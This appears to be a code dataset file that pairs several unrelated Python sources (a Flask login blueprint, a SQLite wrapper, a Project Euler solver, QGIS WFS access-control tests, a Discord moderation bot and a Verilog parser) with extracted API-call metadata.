] | [((459, 474), 'unittest.main', 'unittest.main', ([], {}), '()\n', (472, 474), False, 'import unittest\n'), ((179, 186), 'uuid.uuid4', 'uuid4', ([], {}), '()\n', (184, 186), False, 'from uuid import uuid4\n'), ((205, 236), 'tests.utils.Product', 'Product', (['uuid', '(3)', '"""apple"""', '(3028)'], {}), "(uuid, 3, 'apple', 3028)\n", (212, 236), False, 'from tests.utils import Product\n')] |
from flask import current_app, Blueprint
from flask_login import LoginManager
from ooer.models.user import User
login_manager = LoginManager()
login_manager.login_view = 'auth.login'
login_manager.login_message = u'Please log in to access this page.'
login_manager.login_message_category = 'info'
login_manager.refresh_view = 'auth.reauth'
login_manager.needs_refresh_message = u'To protect your account, please reauthenticate to access this page.'
login_manager.needs_refresh_message_category = 'info'
@login_manager.user_loader
def user_loader(id):
return User.objects(id=id).first()
login_manager.init_app(current_app, add_context_processor=True)
blueprint = Blueprint('auth', __name__)
from views import login, logout, forums
| [
"flask_login.LoginManager",
"ooer.models.user.User.objects",
"flask.Blueprint"
] | [((130, 144), 'flask_login.LoginManager', 'LoginManager', ([], {}), '()\n', (142, 144), False, 'from flask_login import LoginManager\n'), ((675, 702), 'flask.Blueprint', 'Blueprint', (['"""auth"""', '__name__'], {}), "('auth', __name__)\n", (684, 702), False, 'from flask import current_app, Blueprint\n'), ((568, 587), 'ooer.models.user.User.objects', 'User.objects', ([], {'id': 'id'}), '(id=id)\n', (580, 587), False, 'from ooer.models.user import User\n')] |
import os
import sys
from relogic.utils.file_utils import cached_path, RELOGIC_CACHE
PACKAGE_PATH = {
"Anserini": "https://git.uwaterloo.ca/p8shi/data-server/raw/master/anserini-0.6.0-SNAPSHOT-fatjar.jar"
}
anserini_cache_path = cached_path(PACKAGE_PATH['Anserini'], cache_dir=RELOGIC_CACHE)
if sys.platform == 'win32':
separator = ';'
else:
separator = ':'
jar = os.path.join(separator + anserini_cache_path)
if 'CLASSPATH' not in os.environ:
os.environ['CLASSPATH'] = jar
else:
os.environ['CLASSPATH'] += jar | [
"os.path.join",
"relogic.utils.file_utils.cached_path"
] | [((235, 297), 'relogic.utils.file_utils.cached_path', 'cached_path', (["PACKAGE_PATH['Anserini']"], {'cache_dir': 'RELOGIC_CACHE'}), "(PACKAGE_PATH['Anserini'], cache_dir=RELOGIC_CACHE)\n", (246, 297), False, 'from relogic.utils.file_utils import cached_path, RELOGIC_CACHE\n'), ((377, 422), 'os.path.join', 'os.path.join', (['(separator + anserini_cache_path)'], {}), '(separator + anserini_cache_path)\n', (389, 422), False, 'import os\n')] |
'''
MIT License
Copyright (c) 2019 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import sqlite3
class Database:
def __init__(self, name):
self.connection = sqlite3.connect(name)
self.cursor = self.connection.cursor()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.commit()
self.connection.close()
def commit(self):
self.connection.commit()
def execute(self, sql, params=None):
self.cursor.execute(sql, params or ())
def fetchall(self):
return self.cursor.fetchall()
    def fetchone(self):
return self.cursor.fetchone()
def query(self, sql, params=None):
self.cursor.execute(sql, params or ())
return self.fetchall()
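# A minimal usage sketch of the context-manager interface above; the file name, table and
# rows are illustrative only.
if __name__ == "__main__":
    with Database("example.db") as db:
        db.execute("CREATE TABLE IF NOT EXISTS notes (id INTEGER PRIMARY KEY, body TEXT)")
        db.execute("INSERT INTO notes (body) VALUES (?)", ("hello",))
        print(db.query("SELECT * FROM notes"))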
| [
"sqlite3.connect"
] | [((1160, 1181), 'sqlite3.connect', 'sqlite3.connect', (['name'], {}), '(name)\n', (1175, 1181), False, 'import sqlite3\n')] |
'''
Problem 28
11 October 2002
Starting with the number 1 and moving to the right in a clockwise direction a 5 by 5 spiral is formed as follows:
21 22 23 24 25
20 7 8 9 10
19 6 1 2 11
18 5 4 3 12
17 16 15 14 13
It can be verified that the sum of the numbers on the diagonals is 101.
What is the sum of the numbers on the diagonals in a 1001 by 1001 spiral formed in the same way?
----------------------------------------------------------
Created on 12.04.2012
@author: ahallmann
'''
import unittest
import timeit
def print_table(table):
s = ""
for row in table:
for column in row:
s += str(column) + " "
s += "\n"
print(s)
def spiral(size, clockwise=True):
table = [[0 for i in range(size)] for j in range(size)]
i = 1
    x = (size // 2)  # integer division so the indices stay ints on Python 3
    y = (size // 2)
if size % 2 == 0:
x -= 1
w = 1
direction = 0
table[y][x] = i
for m in range(1, size*size):
if m != 1 and m % 2 == 1:
w += 1
for step in range(1, w+1):
if direction == 0:
x += 1
if direction == 1:
if clockwise:
y += 1
else:
y -= 1
if direction == 2:
x -= 1
if direction == 3:
if clockwise:
y -= 1
else:
y += 1
# check if index out of bounds
if x < 0 or x >= size or y < 0 or y >= size:
return table
i += 1
table[y][x] = i
direction = (direction + 1) % 4
return table
def diagonals(table, size):
lst = []
# size = len(table)
for i in range(size):
lst.append(table[i][i])
        if i != size // 2:
lst.append(table[i][size-i-1])
return lst
def count_diagonal(table, size):
return sum(diagonals(table, size))
def solve(size=1001):
table = spiral(size)
return count_diagonal(table, size)
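# A closed-form cross-check (illustrative, not used by the tests below): for an odd n-by-n
# spiral, the four corners of ring k (side length 2k + 1) sum to 4*(2k + 1)**2 - 12*k,
# so the diagonal total is 1 plus that expression summed over all rings.
def solve_closed_form(size=1001):
    return 1 + sum(4 * (2 * k + 1) ** 2 - 12 * k for k in range(1, size // 2 + 1))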
class Test(unittest.TestCase):
def test_sample(self):
self.assertEquals(101, solve(5))
pass
def test_answer(self):
self.assertEquals(669171001, solve(1001))
pass
# -----------------------------------------
def run():
return solve()
if __name__ == '__main__':
unittest.main()
#if __name__ == '__main__':
# t = timeit.Timer("run()", "from __main__ import run")
# count = 100
# print(str(t.timeit(count)) + " seconds for " + str(count) + " runs")
| [
"unittest.main"
] | [((2490, 2505), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2503, 2505), False, 'import unittest\n')] |
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsServer.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = '<NAME>'
__date__ = '28/08/2015'
__copyright__ = 'Copyright 2015, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '176c06ceefb5f555205e72b20c962740cc0ec183'
print('CTEST_FULL_OUTPUT')
from qgis.testing import unittest
import urllib.request
import urllib.parse
import urllib.error
from test_qgsserver_accesscontrol import TestQgsServerAccessControl, XML_NS
class TestQgsServerAccessControlWFS(TestQgsServerAccessControl):
def test_wfs_getcapabilities(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetCapabilities"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<Name>Hello</Name>") != -1,
"No Hello layer in WFS/GetCapabilities\n%s" % response)
self.assertTrue(
str(response).find("<Name>Hello_OnOff</Name>") != -1,
"No Hello layer in WFS/GetCapabilities\n%s" % response)
self.assertTrue(
str(response).find("<Name>Country</Name>") != -1,
"No Country layer in WFS/GetCapabilities\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find("<Name>Hello</Name>") != -1,
"No Hello layer in WFS/GetCapabilities\n%s" % response)
self.assertFalse(
str(response).find("<Name>Country</Name>") != -1,
"Unexpected Country layer in WFS/GetCapabilities\n%s" % response)
def test_wfs_describefeaturetype_hello(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "DescribeFeatureType",
"TYPENAME": "Hello"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find('name="Hello"') != -1,
"No Hello layer in DescribeFeatureType\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find('name="Hello"') != -1,
"No Hello layer in DescribeFeatureType\n%s" % response)
def test_wfs_describefeaturetype_country(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "DescribeFeatureType",
"TYPENAME": "Country"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find('name="Country"') != -1,
"No Country layer in DescribeFeatureType\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertFalse(
str(response).find('name="Country"') != -1,
"Unexpected Country layer in DescribeFeatureType\n%s" % response)
def test_wfs_getfeature_hello(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>1</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"No color in result of GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"Unexpected color in result of GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>NULL</qgs:color>") != -1, # spellok
"Unexpected color NULL in result of GetFeature\n%s" % response)
def test_wfs_getfeature_hello2(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>2</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_country(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_OnOff" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>1</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response) # spellok
# # Subset String # #
def test_wfs_getfeature_subsetstring(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>1</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No good result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No good result in GetFeature\n%s" % response)
def test_wfs_getfeature_subsetstring2(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>2</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"No good result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_project_subsetstring(self):
"""Tests access control with a subset string already applied to a layer in a project
'Hello_Project_SubsetString' layer has a subsetString of "pkuid in (7,8)"
This test checks for retrieving a feature which should be available in with/without access control
"""
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Project_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>7</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
# should be one result
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Feature with pkuid=7 not found in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Feature with pkuid=7 not found in GetFeature, has been incorrectly filtered out by access controls\n%s" % response)
def test_wfs_getfeature_project_subsetstring2(self):
"""Tests access control with a subset string already applied to a layer in a project
'Hello_Project_SubsetString' layer has a subsetString of "pkuid in (7,8)"
This test checks for a feature which should be filtered out by access controls
"""
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Project_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>8</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
# should be one result
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>8</qgs:pk>") != -1,
"Feature with pkuid=8 not found in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>") != -1,
"Feature with pkuid=8 was found in GetFeature, but should have been filtered out by access controls\n%s" % response)
def test_wfs_getfeature_project_subsetstring3(self):
"""Tests access control with a subset string already applied to a layer in a project
'Hello_Project_SubsetString' layer has a subsetString of "pkuid in (7,8)"
This test checks for a features which should be filtered out by project subsetStrings.
For example, pkuid 6 passes the access control checks, but should not be shown because of project layer subsetString
"""
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Project_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>6</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
# should be no results, since pkuid 1 should be filtered out by project subsetString
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") == -1,
"Project based layer subsetString not respected in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>") != -1,
"Project based layer subsetString not respected in GetFeature with restricted access\n%s" % response)
if __name__ == "__main__":
unittest.main()
| [
"qgis.testing.unittest.main"
] | [((13834, 13849), 'qgis.testing.unittest.main', 'unittest.main', ([], {}), '()\n', (13847, 13849), False, 'from qgis.testing import unittest\n')] |
import asyncio
import os
import pathlib
import time
from datetime import datetime as dt
import discord
import lavalink
import pymongo as pym
from discord.ext.commands import *
from jishaku.help_command import *
import config
intents = discord.Intents.all()
print(intents)
class DataLogger:
def __init__(self, permafile):
self.permafile = permafile
self.tempdata = {}
self.mongo = pym.MongoClient()
self.db = self.mongo["BotLogger"]
self.col = self.db["logs"]
# self.tempdata=self.db["random"].find_one({})
print(self.tempdata)
def write(self, author, action, victim, reason, duration="Infinite", backup=None):
with open("num.txt") as f:
num = int(f.read())
with open("num.txt", "w") as f:
f.write(str(num + 1))
doc = {
"author": author.id,
"action": action,
"victim": victim.id,
"reason": reason,
"stamp": dt.now().strftime("%y/%m/%d:%I:%M:%S"),
"case": num + 1,
"duration": duration,
}
if not (backup == None):
doc["backup"] = backup
self.col.insert_one(doc)
def read_all(self):
a = []
for i in self.col.find():
a.append(i)
return a
def read_warns(self):
a = self.read_all()
b = []
for i in a:
if i["action"] == "WARN":
b.append(i)
return b
def read_case(self, num):
return self.col.find_one({"case": num})
def update(self):
pass
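# Minimal usage sketch for the logger above (illustrative only; ``write`` expects objects with
# an ``id`` attribute, a running MongoDB instance and a ``num.txt`` counter file):
#   logger = DataLogger("logs.txt")
#   logger.write(author=member, action="WARN", victim=target, reason="spam")
#   print(logger.read_warns())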
class RR:
def __init__(self, permafile):
self.permafile = permafile
with open(permafile) as f:
pass
class DarkBot(Bot):
def __init__(self, *args, prefix=None, **kwargs):
super().__init__(prefix, *args, **kwargs)
self.bad_words = [
"fuck",
"shit",
"ass",
"whore",
"bitch",
"dick",
"pussy",
"tit",
"shrey",
"tbag",
"retard",
]
self.bad_words = []
self.bg_task = self.loop.create_task(self.playingstatus())
self.mute_task = self.loop.create_task(self.mutecheck())
self.update_task = self.loop.create_task(self.updatelogger())
self.logger = DataLogger("logs.txt")
self.logger.tempdata["mutes"] = {}
self.games = ["with your life", "VALORANT as Yo Mamma"]
self.musicbackend = None
async def on_ready(self):
status = "Planet 666 | discord.gg/8GMA2M3 | 6!help"
self.invite = discord.utils.oauth_url(
self.user.id, discord.Permissions(permissions=8)
)
print(
"Logged in as",
client.user.name,
"\nId:",
client.user.id,
"\nOath:",
self.invite,
)
print("--------")
await self.change_presence(
activity=discord.Game(name=status), status=discord.Status.online
)
async def on_message(self, msg: discord.Message):
ctx = await self.get_context(msg)
if (
msg.author.id == 544699702558588930
and msg.content == "thou shalt be cast in flame"
):
exit()
for i in self.bad_words:
if i in "".join(msg.content.split()).lower() and ctx.author.bot == False:
await msg.delete()
await ctx.send("stop swearing")
if ctx.message.author.id in self.logger.tempdata["mutes"]:
await msg.delete()
with open("blist.txt") as f:
a = f.readlines()
if msg.content.startswith("6!"):
# await ctx.send("HA!")
print(a)
print(ctx.author.id)
if str(ctx.author.id) + "\n" in a:
await ctx.send("Blacklisted")
return
if msg.content.startswith("6!rr"):
return
try:
await self.process_commands(msg)
except Exception as ex:
print(ex)
async def logout(self):
if (musiccog := self.get_cog("Music")) is not None:
await musiccog.logout()
await super().logout()
async def on_command_error(self, ctx, error):
await ctx.send(error)
async def process_commands(self, message):
await super().process_commands(message)
async def playingstatus(self):
await self.wait_until_ready()
while self.is_ready():
status = "Planet 666 | discord.gg/8GMA2M3 | 6!help"
await self.change_presence(
activity=discord.Game(name=status), status=discord.Status.online
)
await asyncio.sleep(120)
async def mutecheck(self):
await self.wait_until_ready()
while self.is_ready():
            for key in list(self.logger.tempdata["mutes"]):  # iterate over a copy so entries can be removed while looping
value = self.logger.tempdata["mutes"][key]
print(key, value)
if value[0] <= time.time():
del self.logger.tempdata["mutes"][key]
await asyncio.sleep(10)
async def updatelogger(self):
await self.wait_until_ready()
while self.is_ready():
self.logger.update()
await asyncio.sleep(10)
@property
def connection(self):
return self._connection
if __name__ == "__main__":
client = DarkBot(
intents=intents,
prefix=when_mentioned_or("6!"),
        help_command=MinimalHelpCommand(),
)
nocogs = ["secret"]
for file in os.listdir("cogs"):
if file.endswith(".py") and not (file[:-3] in nocogs):
name = file[:-3]
try:
client.load_extension(f"cogs.{name}")
print(f"Loaded cog {name}")
except Exception as e:
print(f"Failed to load cog {name} due to error\n", e)
client.load_extension("jishaku")
try:
client.run(config.token)
except:
print("Bye!")
raise
# exit()
| [
"os.listdir",
"discord.Game",
"discord.Permissions",
"discord.Intents.all",
"datetime.datetime.now",
"asyncio.sleep",
"pymongo.MongoClient",
"time.time"
] | [((238, 259), 'discord.Intents.all', 'discord.Intents.all', ([], {}), '()\n', (257, 259), False, 'import discord\n'), ((5633, 5651), 'os.listdir', 'os.listdir', (['"""cogs"""'], {}), "('cogs')\n", (5643, 5651), False, 'import os\n'), ((413, 430), 'pymongo.MongoClient', 'pym.MongoClient', ([], {}), '()\n', (428, 430), True, 'import pymongo as pym\n'), ((2701, 2735), 'discord.Permissions', 'discord.Permissions', ([], {'permissions': '(8)'}), '(permissions=8)\n', (2720, 2735), False, 'import discord\n'), ((4767, 4785), 'asyncio.sleep', 'asyncio.sleep', (['(120)'], {}), '(120)\n', (4780, 4785), False, 'import asyncio\n'), ((5155, 5172), 'asyncio.sleep', 'asyncio.sleep', (['(10)'], {}), '(10)\n', (5168, 5172), False, 'import asyncio\n'), ((5328, 5345), 'asyncio.sleep', 'asyncio.sleep', (['(10)'], {}), '(10)\n', (5341, 5345), False, 'import asyncio\n'), ((984, 992), 'datetime.datetime.now', 'dt.now', ([], {}), '()\n', (990, 992), True, 'from datetime import datetime as dt\n'), ((3009, 3034), 'discord.Game', 'discord.Game', ([], {'name': 'status'}), '(name=status)\n', (3021, 3034), False, 'import discord\n'), ((5065, 5076), 'time.time', 'time.time', ([], {}), '()\n', (5074, 5076), False, 'import time\n'), ((4679, 4704), 'discord.Game', 'discord.Game', ([], {'name': 'status'}), '(name=status)\n', (4691, 4704), False, 'import discord\n')] |
from unittest.mock import Mock, patch
from core import ExactDelayPathfinder
import unittest
import networkx as nx
class TestEDPF(unittest.TestCase):
@patch('exactdelaypathfinder.core.ExactDelayPathfinder', autospec=True)
def test_search(self, mock_EDPF):
""" Tests the search function
Parameters:
mock_EDPF: Mock object reference of ExactDelayPathfinder
"""
new_mock_EDPF = mock_EDPF.return_value
new_mock_EDPF.search.return_value = 42
G = Mock()
new_mock_EDPF.search(G, 10, 'a', 'b')
new_mock_EDPF.search.assert_called()
@patch.object(ExactDelayPathfinder, '_search')
    def test_search_recursive(self, mock_search):
        """ Tests the _search function, the DFS algorithm (recursive method)
            Parameters:
               mock_search: Mock object reference of the patched _search method
        """
new_EDPF = ExactDelayPathfinder()
mock_search.return_value = []
G = Mock()
G.nodes = []
delay = 64;
start = 'a'
end = 'b'
new_EDPF.search(G, 64, 'a', 'b')
new_EDPF._search.assert_called()
def test_search_graph_Error(self):
""" Tests the search function attribute errors for the graph input parameter """
EDPF = ExactDelayPathfinder()
G = None
self.assertRaises(AttributeError, EDPF.search, G, 10,'a', 'b')
def test_search_delay_Error(self):
""" Tests the search function attribute errors for the delay input parameter """
EDPF = ExactDelayPathfinder()
G = Mock()
self.assertRaises(AttributeError, EDPF.search, G, -10,'a', 'b')
def test_search_max_result_Error(self):
""" Tests the search function attribute errors for the max result parameter """
EDPF = ExactDelayPathfinder()
G = Mock()
self.assertRaises(AttributeError, EDPF.search, G, -10,'a', 'b', -5)
| [
"unittest.mock.Mock",
"core.ExactDelayPathfinder",
"unittest.mock.patch",
"unittest.mock.patch.object"
] | [((156, 226), 'unittest.mock.patch', 'patch', (['"""exactdelaypathfinder.core.ExactDelayPathfinder"""'], {'autospec': '(True)'}), "('exactdelaypathfinder.core.ExactDelayPathfinder', autospec=True)\n", (161, 226), False, 'from unittest.mock import Mock, patch\n'), ((639, 684), 'unittest.mock.patch.object', 'patch.object', (['ExactDelayPathfinder', '"""_search"""'], {}), "(ExactDelayPathfinder, '_search')\n", (651, 684), False, 'from unittest.mock import Mock, patch\n'), ((527, 533), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (531, 533), False, 'from unittest.mock import Mock, patch\n'), ((939, 961), 'core.ExactDelayPathfinder', 'ExactDelayPathfinder', ([], {}), '()\n', (959, 961), False, 'from core import ExactDelayPathfinder\n'), ((1013, 1019), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (1017, 1019), False, 'from unittest.mock import Mock, patch\n'), ((1325, 1347), 'core.ExactDelayPathfinder', 'ExactDelayPathfinder', ([], {}), '()\n', (1345, 1347), False, 'from core import ExactDelayPathfinder\n'), ((1593, 1615), 'core.ExactDelayPathfinder', 'ExactDelayPathfinder', ([], {}), '()\n', (1613, 1615), False, 'from core import ExactDelayPathfinder\n'), ((1628, 1634), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (1632, 1634), False, 'from unittest.mock import Mock, patch\n'), ((1859, 1881), 'core.ExactDelayPathfinder', 'ExactDelayPathfinder', ([], {}), '()\n', (1879, 1881), False, 'from core import ExactDelayPathfinder\n'), ((1894, 1900), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (1898, 1900), False, 'from unittest.mock import Mock, patch\n')] |
from __future__ import print_function
import re
import sys
def widthFind(val, widths):
for name in widths:
if widths[name] == val:
return name
print("Could not find a type: " + val)
sys.exit(-1)
def readNoComments(f):
file = ''
comment = False
for line in f:
if comment:
pos = line.find('*/')
if pos < 0:
continue
else:
line = line[pos+2:]
comment = False
pos = line.find('/*')
if pos >= 0:
line = line[0:pos]
comment = True
pos = line.find('//')
if pos >= 0:
line = line[0:pos]
line = line.strip()
if len(line):
file += line + " "
return file
def readModules(file, module_name, widths):
parts = file.split("module "+module_name+"_")[1:]
modules = {}
for module in parts:
end = module.find('endmodule')
if end < 0:
raise Exception('endmodule not found')
module = module[:end]
name = re.match('[A-Za-z0-9_]+',module).group(0)
print('Found a module: "'+name+'"')
posopen = module.find('(')
posclose = module.find(')',posopen)
minouts = []
statements = module[posclose+1:].split(';')
for inout in module[posopen+1:posclose].split(','):
inout = inout.strip()
p = inout.rsplit(' ', 1)
if len(p) == 1:
minouts.append(p[0])
else:
minouts.append(p[1])
statements.append(inout)
minputs = []
moutputs = []
for line in statements:
line = line.strip()
if line.startswith('input') or line.startswith('output'):
pos = line.find(' ')
line2 = line[pos+1:].strip()
pos = line2.rfind(' ')
if pos < 0:
typename = 'bit'
ioname = line2.strip()
else:
type = line2[:pos].strip()
ioname = line2[pos:].strip()
typename = widthFind(type, widths)
if ioname.startswith('__'):
continue
if line.startswith('input'):
minputs.append( (typename, ioname))
#print(' input',ioname)
else:
moutputs.append( (typename, ioname))
#print(' output',ioname)
if ioname not in minouts:
print("------------------------------------------")
print("Warning:", ioname, "is missing in I/O list.")
print("------------------------------------------")
modules[name] = {
'name':name,
'inputs':minputs,
'outputs':moutputs,
}
return modules
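# A minimal driver sketch; the file name, module prefix and width table below are placeholders
# and would have to match the Verilog project actually being parsed.
if __name__ == '__main__':
    example_widths = {'bit': '', 'byte': '[7:0]', 'word': '[15:0]'}
    with open('top.v') as f:
        cleaned = readNoComments(f)
    for mod_name, mod in readModules(cleaned, 'top', example_widths).items():
        print(mod_name, 'inputs:', mod['inputs'], 'outputs:', mod['outputs'])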
| [
"re.match",
"sys.exit"
] | [((191, 203), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (199, 203), False, 'import sys\n'), ((861, 894), 're.match', 're.match', (['"""[A-Za-z0-9_]+"""', 'module'], {}), "('[A-Za-z0-9_]+', module)\n", (869, 894), False, 'import re\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
##############################################
#
# This is open source software licensed under the Apache License 2.0
